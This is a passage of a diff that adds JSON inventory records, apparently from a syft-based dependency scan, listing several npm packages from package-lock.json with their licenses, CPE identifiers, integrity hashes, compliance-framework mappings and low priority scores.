"sha512-m6UrgzFVUYawGBh1dUsWR5M2Clqic9RVXC/9f8ceNlv2IcO9j9J/z8UoCLPqtsPBFNzEpfR3xftohbfqDx8EQA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f590fee2d4fea15c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: is-binary-path 2.1.0", + "title": "is-binary-path 2.1.0", + "description": "Package discovered: is-binary-path 2.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "12d3bfff6ef69b2c", + "name": "is-binary-path", + "version": "2.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:is-binary-path:is-binary-path:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-binary-path:is_binary_path:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_binary_path:is-binary-path:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_binary_path:is_binary_path:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-binary:is-binary-path:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-binary:is_binary_path:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_binary:is-binary-path:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_binary:is_binary_path:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is-binary-path:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is_binary_path:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/is-binary-path@2.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz", + "integrity": "sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==", + "dependencies": { + "binary-extensions": "^2.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "3e8a78c5009c1819", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: is-core-module 2.16.1", + "title": "is-core-module 2.16.1", + "description": "Package discovered: is-core-module 2.16.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9f592f96ab7392ec", + "name": "is-core-module", + "version": "2.16.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:is-core-module:is-core-module:2.16.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-core-module:is_core_module:2.16.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_core_module:is-core-module:2.16.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_core_module:is_core_module:2.16.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-core:is-core-module:2.16.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-core:is_core_module:2.16.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_core:is-core-module:2.16.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_core:is_core_module:2.16.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is-core-module:2.16.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is_core_module:2.16.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/is-core-module@2.16.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.16.1.tgz", + "integrity": "sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w==", + "dependencies": { + "hasown": "^2.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "bb2d7c3406b84981", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: is-extglob 2.1.1", + "title": "is-extglob 2.1.1", + "description": "Package discovered: is-extglob 2.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b2879743f62f2c47", + "name": "is-extglob", + "version": "2.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:is-extglob:is-extglob:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-extglob:is_extglob:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_extglob:is-extglob:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_extglob:is_extglob:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is-extglob:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is_extglob:2.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/is-extglob@2.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", + "integrity": "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "437e0c6e090c00f1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: is-fullwidth-code-point 3.0.0", + "title": "is-fullwidth-code-point 3.0.0", + "description": "Package discovered: is-fullwidth-code-point 3.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8a7d27e13373f9f8", + "name": "is-fullwidth-code-point", + "version": "3.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:is-fullwidth-code-point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-fullwidth-code-point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_fullwidth_code_point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_fullwidth_code_point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-fullwidth-code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-fullwidth-code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_fullwidth_code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_fullwidth_code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/is-fullwidth-code-point@3.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", + "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8b982d6ae21c367b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: is-glob 4.0.3", + "title": "is-glob 4.0.3", + "description": "Package discovered: is-glob 4.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6a2e0a343ed2b45b", + "name": "is-glob", + "version": "4.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:is-glob:is-glob:4.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-glob:is_glob:4.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_glob:is-glob:4.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_glob:is_glob:4.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is-glob:4.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is_glob:4.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/is-glob@4.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", + "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", + "dependencies": { + "is-extglob": "^2.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f5c20bc28d065782", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: is-number 7.0.0", + "title": "is-number 7.0.0", + "description": "Package discovered: is-number 7.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "19d61645d0264090", + "name": "is-number", + "version": "7.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:is-number:is-number:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-number:is_number:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_number:is-number:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_number:is_number:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is-number:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is_number:7.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/is-number@7.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1ec1886de995b530", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: is-stream 2.0.1", + "title": "is-stream 2.0.1", + "description": "Package discovered: is-stream 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0d47a7f43264d12f", + "name": "is-stream", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:is-stream:is-stream:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-stream:is_stream:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_stream:is-stream:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_stream:is_stream:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is-stream:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is_stream:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/is-stream@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", + "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": 